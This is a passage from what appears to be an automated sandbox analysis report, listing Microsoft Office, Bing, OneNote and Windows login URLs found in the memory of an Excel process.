Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.jsonJ
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965819822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp String found in binary or memory: https://enrichment.osi.office.net/Officev
Source: EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965819822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp String found in binary or memory: https://enrichment.osi.office.net/https://login.windows.net/common/oauth2/authorizeMBI_SSLhttps://os
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://entitlement.diagnosticssdf.office.com=
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://entity.osi.office.net/t
Source: EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: EXCEL.EXE, 00000000.00000002.965380107.0000000013197000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://graph.ppe.windows.net
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://graph.ppe.windows.net/
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://graph.ppe.windows.net/8
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://graph.windows.net
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://graph.windows.net/
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://hubble.officeapps.live.com
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://hubble.officeapps.live.com-
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://hubble.officeapps.live.com8
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://hubble.officeapps.live.comsGraphWY
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: EXCEL.EXE, 00000000.00000002.963180768.000000000FA50000.00000004.00000001.sdmp String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3ds
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
Source: EXCEL.EXE, 00000000.00000002.965380107.0000000013197000.00000004.00000001.sdmp String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
Source: EXCEL.EXE, 00000000.00000002.965446907.00000000131D8000.00000004.00000001.sdmp String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
Source: EXCEL.EXE, 00000000.00000002.965446907.00000000131D8000.00000004.00000001.sdmp String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: EXCEL.EXE, 00000000.00000002.965415330.00000000131CD000.00000004.00000001.sdmp String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?C
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://incidents.diagnostics.office.com
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://incidents.diagnosticssdf.office.com1
Source: EXCEL.EXE, 00000000.00000002.965380107.0000000013197000.00000004.00000001.sdmp String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveApp
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: EXCEL.EXE, 00000000.00000002.965380107.0000000013197000.00000004.00000001.sdmp String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing%
Source: EXCEL.EXE, 00000000.00000003.957609902.00000000133B4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869052762.00000000133AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965787422.00000000133B5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812737746.00000000133AF000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: EXCEL.EXE, 00000000.00000003.957609902.00000000133B4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869052762.00000000133AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965787422.00000000133B5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812737746.00000000133AF000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: EXCEL.EXE, 00000000.00000002.965380107.0000000013197000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: EXCEL.EXE, 00000000.00000003.957609902.00000000133B4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869052762.00000000133AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965787422.00000000133B5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812737746.00000000133AF000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://lifecycle.office.com
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://lifecycle.office.com(
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://lifecycle.office.coms
Source: EXCEL.EXE, 00000000.00000002.966914552.0000000015C79000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com
Source: EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957568679.0000000013401000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965837750.0000000013402000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://login.microsoftonline.com
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://login.microsoftonline.com/
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorizeB
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorizek
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://login.windows.local
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.localtes
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize%
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize(
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize(f
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize)
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize)g
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize-
